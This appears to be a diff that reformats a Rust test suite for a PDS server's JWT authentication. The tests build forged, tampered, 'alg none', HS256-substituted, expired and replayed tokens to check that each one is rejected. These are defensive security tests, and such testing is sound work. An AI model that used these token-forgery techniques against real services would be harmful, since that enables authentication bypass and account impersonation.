did, "aud": "did:web:test.pds", 201 "iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS 202 }); 203 - let _ = verify_access_token(&create_custom_jwt(&header, &far_future, &key_bytes), &key_bytes); 204 205 let negative_iat = json!({ 206 "iss": did, "sub": did, "aud": "did:web:test.pds", 207 "iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS 208 }); 209 - let _ = verify_access_token(&create_custom_jwt(&header, &negative_iat, &key_bytes), &key_bytes); 210 } 211 212 #[test] 213 fn test_malformed_tokens() { 214 let key_bytes = generate_user_key(); 215 216 - for token in ["", "not-a-token", "one.two", "one.two.three.four", "....", 217 - "eyJhbGciOiJFUzI1NksifQ", "eyJhbGciOiJFUzI1NksifQ.", "eyJhbGciOiJFUzI1NksifQ..", 218 - ".eyJzdWIiOiJ0ZXN0In0.", "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig"] { 219 - assert!(verify_access_token(token, &key_bytes).is_err(), "Malformed token must be rejected"); 220 } 221 222 let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}"); 223 let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#); 224 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 225 - assert!(verify_access_token(&format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), &key_bytes).is_err()); 226 227 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#); 228 let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}"); 229 - assert!(verify_access_token(&format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), &key_bytes).is_err()); 230 } 231 232 #[test] ··· 239 "iss": did, "sub": did, "aud": "did:web:test", 240 "iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS 241 }); 242 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_exp, &key_bytes), &key_bytes).is_err()); 243 244 let missing_iat = json!({ 245 "iss": did, "sub": did, "aud": "did:web:test", 246 "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 247 }); 248 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_iat, &key_bytes), &key_bytes).is_err()); 249 250 let missing_sub = json!({ 251 "iss": did, "aud": "did:web:test", 252 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 253 }); 254 - assert!(verify_access_token(&create_custom_jwt(&header, &missing_sub, &key_bytes), &key_bytes).is_err()); 255 256 let wrong_types = json!({ 257 "iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"}, 258 "iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS 259 }); 260 - assert!(verify_access_token(&create_custom_jwt(&header, &wrong_types, &key_bytes), &key_bytes).is_err()); 261 262 let unicode_injection = json!({ 263 "iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta", 264 "aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 265 "jti": "test", "scope": SCOPE_ACCESS 266 }); 267 - if let Ok(data) = verify_access_token(&create_custom_jwt(&header, &unicode_injection, &key_bytes), &key_bytes) { 268 assert!(!data.claims.sub.contains('\0')); 269 } 270 } ··· 308 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 309 "jti": "test", "scope": SCOPE_ACCESS 310 }); 311 - assert!(verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok()); 312 313 let valid_token = create_access_token(did, &key_bytes).expect("create token"); 314 let parts: Vec<&str> = valid_token.split('.').collect(); 315 let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 316 almost_valid[0] ^= 1; 317 - let almost_valid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&almost_valid)); 318 - let completely_invalid_token = format!("{}.{}.{}", parts[0], parts[1], URL_SAFE_NO_PAD.encode(&[0xFFu8; 64])); 319 let _ = verify_access_token(&almost_valid_token, &key_bytes); 320 let _ = verify_access_token(&completely_invalid_token, &key_bytes); 321 } ··· 327 328 let key_bytes = generate_user_key(); 329 let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap(); 330 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 331 .header("Authorization", format!("Bearer {}", forged_token)) 332 - .send().await.unwrap(); 333 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged token must be rejected"); 334 335 let (access_jwt, _did) = create_account_and_login(&http_client).await; 336 let parts: Vec<&str> = access_jwt.split('.').collect(); ··· 338 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 339 340 payload["exp"] = json!(Utc::now().timestamp() - 3600); 341 - let expired_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), parts[2]); 342 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 343 .header("Authorization", format!("Bearer {}", expired_token)) 344 - .send().await.unwrap(); 345 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 346 347 let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 348 tampered_payload["sub"] = json!("did:plc:attacker"); 349 tampered_payload["iss"] = json!("did:plc:attacker"); 350 - let tampered_token = format!("{}.{}.{}", parts[0], URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), parts[2]); 351 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 352 .header("Authorization", format!("Bearer {}", tampered_token)) 353 - .send().await.unwrap(); 354 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 355 } 356 ··· 360 let http_client = client(); 361 let (access_jwt, _did) = create_account_and_login(&http_client).await; 362 363 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 364 .header("Authorization", format!("Bearer {}", access_jwt)) 365 - .send().await.unwrap(); 366 assert_eq!(res.status(), StatusCode::OK); 367 368 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 369 .header("Authorization", format!("bearer {}", access_jwt)) 370 - .send().await.unwrap(); 371 assert_eq!(res.status(), StatusCode::OK); 372 373 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 374 .header("Authorization", format!("Basic {}", access_jwt)) 375 - .send().await.unwrap(); 376 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 377 378 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 379 .header("Authorization", &access_jwt) 380 - .send().await.unwrap(); 381 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 382 383 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 384 .header("Authorization", "Bearer ") 385 - .send().await.unwrap(); 386 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 387 } 388 ··· 392 let http_client = client(); 393 let (access_jwt, _did) = create_account_and_login(&http_client).await; 394 395 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 396 .header("Authorization", format!("Bearer {}", access_jwt)) 397 - .send().await.unwrap(); 398 assert_eq!(res.status(), StatusCode::OK); 399 400 - let logout = http_client.post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 401 .header("Authorization", format!("Bearer {}", access_jwt)) 402 - .send().await.unwrap(); 403 assert_eq!(logout.status(), StatusCode::OK); 404 405 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 406 .header("Authorization", format!("Bearer {}", access_jwt)) 407 - .send().await.unwrap(); 408 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 409 } 410 ··· 414 let http_client = client(); 415 let (access_jwt, _did) = create_account_and_login(&http_client).await; 416 417 - let deact = http_client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 418 .header("Authorization", format!("Bearer {}", access_jwt)) 419 .json(&json!({})) 420 - .send().await.unwrap(); 421 assert_eq!(deact.status(), StatusCode::OK); 422 423 - let res = http_client.get(format!("{}/xrpc/com.atproto.server.getSession", url)) 424 .header("Authorization", format!("Bearer {}", access_jwt)) 425 - .send().await.unwrap(); 426 assert_eq!(res.status(), StatusCode::OK); 427 let body: Value = res.json().await.unwrap(); 428 assert_eq!(body["active"], false); 429 430 - let post_res = http_client.post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 431 .header("Authorization", format!("Bearer {}", access_jwt)) 432 .json(&json!({ 433 "repo": _did, ··· 438 "createdAt": "2024-01-01T00:00:00Z" 439 } 440 })) 441 - .send().await.unwrap(); 442 assert_eq!(post_res.status(), StatusCode::UNAUTHORIZED); 443 let post_body: Value = post_res.json().await.unwrap(); 444 assert_eq!(post_body["error"], "AccountDeactivated"); ··· 452 let handle = format!("rt-replay-jwt-{}", ts); 453 let email = format!("rt-replay-jwt-{}@example.com", ts); 454 455 - let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 456 .json(&json!({ "handle": handle, "email": email, "password": "test-password-123" })) 457 - .send().await.unwrap(); 458 assert_eq!(create_res.status(), StatusCode::OK); 459 let account: Value = create_res.json().await.unwrap(); 460 let did = account["did"].as_str().unwrap(); ··· 462 let pool = sqlx::postgres::PgPoolOptions::new() 463 .max_connections(2) 464 .connect(&get_db_connection_string().await) 465 - .await.unwrap(); 466 let code: String = sqlx::query_scalar!( 467 "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'", 468 did 469 ).fetch_one(&pool).await.unwrap(); 470 471 - let confirm = http_client.post(format!("{}/xrpc/com.atproto.server.confirmSignup", url)) 472 .json(&json!({ "did": did, "verificationCode": code })) 473 - .send().await.unwrap(); 474 assert_eq!(confirm.status(), StatusCode::OK); 475 let confirmed: Value = confirm.json().await.unwrap(); 476 let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string(); 477 478 - let first = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 479 .header("Authorization", format!("Bearer {}", refresh_jwt)) 480 - .send().await.unwrap(); 481 assert_eq!(first.status(), StatusCode::OK); 482 483 - let replay = http_client.post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 484 .header("Authorization", format!("Bearer {}", refresh_jwt)) 485 - .send().await.unwrap(); 486 assert_eq!(replay.status(), StatusCode::UNAUTHORIZED); 487 }
··· 1 #![allow(unused_imports)] 2 mod common; 3 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 4 use chrono::{Duration, Utc}; 5 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 6 use k256::SecretKey; ··· 9 use reqwest::StatusCode; 10 use serde_json::{Value, json}; 11 use sha2::{Digest, Sha256}; 12 + use tranquil_pds::auth::{ 13 + self, SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED, SCOPE_REFRESH, 14 + TOKEN_TYPE_ACCESS, TOKEN_TYPE_REFRESH, TOKEN_TYPE_SERVICE, create_access_token, 15 + create_refresh_token, create_service_token, get_did_from_token, get_jti_from_token, 16 + verify_access_token, verify_refresh_token, verify_token, 17 + }; 18 19 fn generate_user_key() -> Vec<u8> { 20 let secret_key = SecretKey::random(&mut OsRng); ··· 48 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature); 49 let result = verify_access_token(&forged_token, &key_bytes); 50 assert!(result.is_err(), "Forged signature must be rejected"); 51 + assert!( 52 + result 53 + .err() 54 + .unwrap() 55 + .to_string() 56 + .to_lowercase() 57 + .contains("signature") 58 + ); 59 60 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 61 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 62 payload["sub"] = json!("did:plc:attacker"); 63 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 64 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 65 + assert!( 66 + verify_access_token(&modified_token, &key_bytes).is_err(), 67 + "Modified payload must be rejected" 68 + ); 69 70 let sig_bytes = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 71 let truncated_sig = URL_SAFE_NO_PAD.encode(&sig_bytes[..32]); 72 let truncated_token = format!("{}.{}.{}", parts[0], parts[1], truncated_sig); 73 + assert!( 74 + verify_access_token(&truncated_token, &key_bytes).is_err(), 75 + "Truncated signature must be rejected" 76 + ); 77 78 let mut extended_sig = sig_bytes.clone(); 79 extended_sig.extend_from_slice(&[0u8; 32]); 80 + let extended_token = format!( 81 + "{}.{}.{}", 82 + parts[0], 83 + parts[1], 84 + URL_SAFE_NO_PAD.encode(&extended_sig) 85 + ); 86 + assert!( 87 + verify_access_token(&extended_token, &key_bytes).is_err(), 88 + "Extended signature must be rejected" 89 + ); 90 91 let key_bytes_user2 = generate_user_key(); 92 + assert!( 93 + verify_access_token(&token, &key_bytes_user2).is_err(), 94 + "Token signed with different key must be rejected" 95 + ); 96 } 97 98 #[test] ··· 107 "jti": "attack-token", "scope": SCOPE_ACCESS 108 }); 109 let none_token = create_unsigned_jwt(&none_header, &claims); 110 + assert!( 111 + verify_access_token(&none_token, &key_bytes).is_err(), 112 + "Algorithm 'none' must be rejected" 113 + ); 114 115 let hs256_header = json!({ "alg": "HS256", "typ": TOKEN_TYPE_ACCESS }); 116 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&hs256_header).unwrap()); ··· 122 mac.update(message.as_bytes()); 123 let hmac_sig = mac.finalize().into_bytes(); 124 let hs256_token = format!("{}.{}", message, URL_SAFE_NO_PAD.encode(&hmac_sig)); 125 + assert!( 126 + verify_access_token(&hs256_token, &key_bytes).is_err(), 127 + "HS256 substitution must be rejected" 128 + ); 129 130 for (alg, sig_len) in [("RS256", 256), ("ES256", 64)] { 131 let header = json!({ "alg": alg, "typ": TOKEN_TYPE_ACCESS }); 132 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 133 let fake_sig = URL_SAFE_NO_PAD.encode(&vec![1u8; sig_len]); 134 let token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 135 + assert!( 136 + verify_access_token(&token, &key_bytes).is_err(), 137 + "{} substitution must be rejected", 138 + alg 139 + ); 140 } 141 } 142 ··· 148 let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token"); 149 let result = verify_access_token(&refresh_token, &key_bytes); 150 assert!(result.is_err(), "Refresh token as access must be rejected"); 151 + assert!( 152 + result 153 + .err() 154 + .unwrap() 155 + .to_string() 156 + .contains("Invalid token type") 157 + ); 158 159 let access_token = create_access_token(did, &key_bytes).expect("create access token"); 160 let result = verify_refresh_token(&access_token, &key_bytes); 161 assert!(result.is_err(), "Access token as refresh must be rejected"); 162 + assert!( 163 + result 164 + .err() 165 + .unwrap() 166 + .to_string() 167 + .contains("Invalid token type") 168 + ); 169 170 + let service_token = 171 + create_service_token(did, "did:web:target", "com.example.method", &key_bytes).unwrap(); 172 + assert!( 173 + verify_access_token(&service_token, &key_bytes).is_err(), 174 + "Service token as access must be rejected" 175 + ); 176 } 177 178 #[test] ··· 186 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 187 "jti": "test", "scope": "admin.all" 188 }); 189 + let result = verify_access_token( 190 + &create_custom_jwt(&header, &invalid_scope, &key_bytes), 191 + &key_bytes, 192 + ); 193 + assert!( 194 + result.is_err() 195 + && result 196 + .err() 197 + .unwrap() 198 + .to_string() 199 + .contains("Invalid token scope") 200 + ); 201 202 let empty_scope = json!({ 203 "iss": did, "sub": did, "aud": "did:web:test.pds", 204 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 205 "jti": "test", "scope": "" 206 }); 207 + assert!( 208 + verify_access_token( 209 + &create_custom_jwt(&header, &empty_scope, &key_bytes), 210 + &key_bytes 211 + ) 212 + .is_err() 213 + ); 214 215 let missing_scope = json!({ 216 "iss": did, "sub": did, "aud": "did:web:test.pds", 217 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 218 "jti": "test" 219 }); 220 + assert!( 221 + verify_access_token( 222 + &create_custom_jwt(&header, &missing_scope, &key_bytes), 223 + &key_bytes 224 + ) 225 + .is_err() 226 + ); 227 228 for scope in [SCOPE_ACCESS, SCOPE_APP_PASS, SCOPE_APP_PASS_PRIVILEGED] { 229 let claims = json!({ ··· 231 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 232 "jti": "test", "scope": scope 233 }); 234 + assert!( 235 + verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes) 236 + .is_ok() 237 + ); 238 } 239 240 let refresh_scope = json!({ ··· 242 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 243 "jti": "test", "scope": SCOPE_REFRESH 244 }); 245 + assert!( 246 + verify_access_token( 247 + &create_custom_jwt(&header, &refresh_scope, &key_bytes), 248 + &key_bytes 249 + ) 250 + .is_err() 251 + ); 252 } 253 254 #[test] ··· 262 "iss": did, "sub": did, "aud": "did:web:test.pds", 263 "iat": now - 7200, "exp": now - 3600, "jti": "test", "scope": SCOPE_ACCESS 264 }); 265 + let result = verify_access_token( 266 + &create_custom_jwt(&header, &expired, &key_bytes), 267 + &key_bytes, 268 + ); 269 assert!(result.is_err() && result.err().unwrap().to_string().contains("expired")); 270 271 let future_iat = json!({ 272 "iss": did, "sub": did, "aud": "did:web:test.pds", 273 "iat": now + 60, "exp": now + 7200, "jti": "test", "scope": SCOPE_ACCESS 274 }); 275 + assert!( 276 + verify_access_token( 277 + &create_custom_jwt(&header, &future_iat, &key_bytes), 278 + &key_bytes 279 + ) 280 + .is_ok() 281 + ); 282 283 let just_expired = json!({ 284 "iss": did, "sub": did, "aud": "did:web:test.pds", 285 "iat": now - 10, "exp": now - 1, "jti": "test", "scope": SCOPE_ACCESS 286 }); 287 + assert!( 288 + verify_access_token( 289 + &create_custom_jwt(&header, &just_expired, &key_bytes), 290 + &key_bytes 291 + ) 292 + .is_err() 293 + ); 294 295 let far_future = json!({ 296 "iss": did, "sub": did, "aud": "did:web:test.pds", 297 "iat": now, "exp": i64::MAX, "jti": "test", "scope": SCOPE_ACCESS 298 }); 299 + let _ = verify_access_token( 300 + &create_custom_jwt(&header, &far_future, &key_bytes), 301 + &key_bytes, 302 + ); 303 304 let negative_iat = json!({ 305 "iss": did, "sub": did, "aud": "did:web:test.pds", 306 "iat": -1000000000i64, "exp": now + 3600, "jti": "test", "scope": SCOPE_ACCESS 307 }); 308 + let _ = verify_access_token( 309 + &create_custom_jwt(&header, &negative_iat, &key_bytes), 310 + &key_bytes, 311 + ); 312 } 313 314 #[test] 315 fn test_malformed_tokens() { 316 let key_bytes = generate_user_key(); 317 318 + for token in [ 319 + "", 320 + "not-a-token", 321 + "one.two", 322 + "one.two.three.four", 323 + "....", 324 + "eyJhbGciOiJFUzI1NksifQ", 325 + "eyJhbGciOiJFUzI1NksifQ.", 326 + "eyJhbGciOiJFUzI1NksifQ..", 327 + ".eyJzdWIiOiJ0ZXN0In0.", 328 + "!!invalid-base64!!.eyJzdWIiOiJ0ZXN0In0.sig", 329 + ] { 330 + assert!( 331 + verify_access_token(token, &key_bytes).is_err(), 332 + "Malformed token must be rejected" 333 + ); 334 } 335 336 let invalid_header = URL_SAFE_NO_PAD.encode("{not valid json}"); 337 let claims_b64 = URL_SAFE_NO_PAD.encode(r#"{"sub":"test"}"#); 338 let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 339 + assert!( 340 + verify_access_token( 341 + &format!("{}.{}.{}", invalid_header, claims_b64, fake_sig), 342 + &key_bytes 343 + ) 344 + .is_err() 345 + ); 346 347 let header_b64 = URL_SAFE_NO_PAD.encode(r#"{"alg":"ES256K","typ":"at+jwt"}"#); 348 let invalid_claims = URL_SAFE_NO_PAD.encode("{not valid json}"); 349 + assert!( 350 + verify_access_token( 351 + &format!("{}.{}.{}", header_b64, invalid_claims, fake_sig), 352 + &key_bytes 353 + ) 354 + .is_err() 355 + ); 356 } 357 358 #[test] ··· 365 "iss": did, "sub": did, "aud": "did:web:test", 366 "iat": Utc::now().timestamp(), "scope": SCOPE_ACCESS 367 }); 368 + assert!( 369 + verify_access_token( 370 + &create_custom_jwt(&header, &missing_exp, &key_bytes), 371 + &key_bytes 372 + ) 373 + .is_err() 374 + ); 375 376 let missing_iat = json!({ 377 "iss": did, "sub": did, "aud": "did:web:test", 378 "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 379 }); 380 + assert!( 381 + verify_access_token( 382 + &create_custom_jwt(&header, &missing_iat, &key_bytes), 383 + &key_bytes 384 + ) 385 + .is_err() 386 + ); 387 388 let missing_sub = json!({ 389 "iss": did, "aud": "did:web:test", 390 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "scope": SCOPE_ACCESS 391 }); 392 + assert!( 393 + verify_access_token( 394 + &create_custom_jwt(&header, &missing_sub, &key_bytes), 395 + &key_bytes 396 + ) 397 + .is_err() 398 + ); 399 400 let wrong_types = json!({ 401 "iss": 12345, "sub": ["did:plc:test"], "aud": {"url": "did:web:test"}, 402 "iat": "not a number", "exp": "also not a number", "jti": null, "scope": SCOPE_ACCESS 403 }); 404 + assert!( 405 + verify_access_token( 406 + &create_custom_jwt(&header, &wrong_types, &key_bytes), 407 + &key_bytes 408 + ) 409 + .is_err() 410 + ); 411 412 let unicode_injection = json!({ 413 "iss": "did:plc:test\u{0000}attacker", "sub": "did:plc:test\u{202E}rekatta", 414 "aud": "did:web:test.pds", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 415 "jti": "test", "scope": SCOPE_ACCESS 416 }); 417 + if let Ok(data) = verify_access_token( 418 + &create_custom_jwt(&header, &unicode_injection, &key_bytes), 419 + &key_bytes, 420 + ) { 421 assert!(!data.claims.sub.contains('\0')); 422 } 423 } ··· 461 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, 462 "jti": "test", "scope": SCOPE_ACCESS 463 }); 464 + assert!( 465 + verify_access_token(&create_custom_jwt(&header, &claims, &key_bytes), &key_bytes).is_ok() 466 + ); 467 468 let valid_token = create_access_token(did, &key_bytes).expect("create token"); 469 let parts: Vec<&str> = valid_token.split('.').collect(); 470 let mut almost_valid = URL_SAFE_NO_PAD.decode(parts[2]).unwrap(); 471 almost_valid[0] ^= 1; 472 + let almost_valid_token = format!( 473 + "{}.{}.{}", 474 + parts[0], 475 + parts[1], 476 + URL_SAFE_NO_PAD.encode(&almost_valid) 477 + ); 478 + let completely_invalid_token = format!( 479 + "{}.{}.{}", 480 + parts[0], 481 + parts[1], 482 + URL_SAFE_NO_PAD.encode(&[0xFFu8; 64]) 483 + ); 484 let _ = verify_access_token(&almost_valid_token, &key_bytes); 485 let _ = verify_access_token(&completely_invalid_token, &key_bytes); 486 } ··· 492 493 let key_bytes = generate_user_key(); 494 let forged_token = create_access_token("did:plc:fake-user", &key_bytes).unwrap(); 495 + let res = http_client 496 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 497 .header("Authorization", format!("Bearer {}", forged_token)) 498 + .send() 499 + .await 500 + .unwrap(); 501 + assert_eq!( 502 + res.status(), 503 + StatusCode::UNAUTHORIZED, 504 + "Forged token must be rejected" 505 + ); 506 507 let (access_jwt, _did) = create_account_and_login(&http_client).await; 508 let parts: Vec<&str> = access_jwt.split('.').collect(); ··· 510 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 511 512 payload["exp"] = json!(Utc::now().timestamp() - 3600); 513 + let expired_token = format!( 514 + "{}.{}.{}", 515 + parts[0], 516 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), 517 + parts[2] 518 + ); 519 + let res = http_client 520 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 521 .header("Authorization", format!("Bearer {}", expired_token)) 522 + .send() 523 + .await 524 + .unwrap(); 525 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 526 527 let mut tampered_payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 528 tampered_payload["sub"] = json!("did:plc:attacker"); 529 tampered_payload["iss"] = json!("did:plc:attacker"); 530 + let tampered_token = format!( 531 + "{}.{}.{}", 532 + parts[0], 533 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&tampered_payload).unwrap()), 534 + parts[2] 535 + ); 536 + let res = http_client 537 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 538 .header("Authorization", format!("Bearer {}", tampered_token)) 539 + .send() 540 + .await 541 + .unwrap(); 542 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 543 } 544 ··· 548 let http_client = client(); 549 let (access_jwt, _did) = create_account_and_login(&http_client).await; 550 551 + let res = http_client 552 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 553 .header("Authorization", format!("Bearer {}", access_jwt)) 554 + .send() 555 + .await 556 + .unwrap(); 557 assert_eq!(res.status(), StatusCode::OK); 558 559 + let res = http_client 560 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 561 .header("Authorization", format!("bearer {}", access_jwt)) 562 + .send() 563 + .await 564 + .unwrap(); 565 assert_eq!(res.status(), StatusCode::OK); 566 567 + let res = http_client 568 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 569 .header("Authorization", format!("Basic {}", access_jwt)) 570 + .send() 571 + .await 572 + .unwrap(); 573 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 574 575 + let res = http_client 576 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 577 .header("Authorization", &access_jwt) 578 + .send() 579 + .await 580 + .unwrap(); 581 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 582 583 + let res = http_client 584 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 585 .header("Authorization", "Bearer ") 586 + .send() 587 + .await 588 + .unwrap(); 589 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 590 } 591 ··· 595 let http_client = client(); 596 let (access_jwt, _did) = create_account_and_login(&http_client).await; 597 598 + let res = http_client 599 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 600 .header("Authorization", format!("Bearer {}", access_jwt)) 601 + .send() 602 + .await 603 + .unwrap(); 604 assert_eq!(res.status(), StatusCode::OK); 605 606 + let logout = http_client 607 + .post(format!("{}/xrpc/com.atproto.server.deleteSession", url)) 608 .header("Authorization", format!("Bearer {}", access_jwt)) 609 + .send() 610 + .await 611 + .unwrap(); 612 assert_eq!(logout.status(), StatusCode::OK); 613 614 + let res = http_client 615 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 616 .header("Authorization", format!("Bearer {}", access_jwt)) 617 + .send() 618 + .await 619 + .unwrap(); 620 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 621 } 622 ··· 626 let http_client = client(); 627 let (access_jwt, _did) = create_account_and_login(&http_client).await; 628 629 + let deact = http_client 630 + .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 631 .header("Authorization", format!("Bearer {}", access_jwt)) 632 .json(&json!({})) 633 + .send() 634 + .await 635 + .unwrap(); 636 assert_eq!(deact.status(), StatusCode::OK); 637 638 + let res = http_client 639 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 640 .header("Authorization", format!("Bearer {}", access_jwt)) 641 + .send() 642 + .await 643 + .unwrap(); 644 assert_eq!(res.status(), StatusCode::OK); 645 let body: Value = res.json().await.unwrap(); 646 assert_eq!(body["active"], false); 647 648 + let post_res = http_client 649 + .post(format!("{}/xrpc/com.atproto.repo.createRecord", url)) 650 .header("Authorization", format!("Bearer {}", access_jwt)) 651 .json(&json!({ 652 "repo": _did, ··· 657 "createdAt": "2024-01-01T00:00:00Z" 658 } 659 })) 660 + .send() 661 + .await 662 + .unwrap(); 663 assert_eq!(post_res.status(), StatusCode::UNAUTHORIZED); 664 let post_body: Value = post_res.json().await.unwrap(); 665 assert_eq!(post_body["error"], "AccountDeactivated"); ··· 673 let handle = format!("rt-replay-jwt-{}", ts); 674 let email = format!("rt-replay-jwt-{}@example.com", ts); 675 676 + let create_res = http_client 677 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 678 .json(&json!({ "handle": handle, "email": email, "password": "test-password-123" })) 679 + .send() 680 + .await 681 + .unwrap(); 682 assert_eq!(create_res.status(), StatusCode::OK); 683 let account: Value = create_res.json().await.unwrap(); 684 let did = account["did"].as_str().unwrap(); ··· 686 let pool = sqlx::postgres::PgPoolOptions::new() 687 .max_connections(2) 688 .connect(&get_db_connection_string().await) 689 + .await 690 + .unwrap(); 691 let code: String = sqlx::query_scalar!( 692 "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE did = $1) AND channel = 'email'", 693 did 694 ).fetch_one(&pool).await.unwrap(); 695 696 + let confirm = http_client 697 + .post(format!("{}/xrpc/com.atproto.server.confirmSignup", url)) 698 .json(&json!({ "did": did, "verificationCode": code })) 699 + .send() 700 + .await 701 + .unwrap(); 702 assert_eq!(confirm.status(), StatusCode::OK); 703 let confirmed: Value = confirm.json().await.unwrap(); 704 let refresh_jwt = confirmed["refreshJwt"].as_str().unwrap().to_string(); 705 706 + let first = http_client 707 + .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 708 .header("Authorization", format!("Bearer {}", refresh_jwt)) 709 + .send() 710 + .await 711 + .unwrap(); 712 assert_eq!(first.status(), StatusCode::OK); 713 714 + let replay = http_client 715 + .post(format!("{}/xrpc/com.atproto.server.refreshSession", url)) 716 .header("Authorization", format!("Bearer {}", refresh_jwt)) 717 + .send() 718 + .await 719 + .unwrap(); 720 assert_eq!(replay.status(), StatusCode::UNAUTHORIZED); 721 }
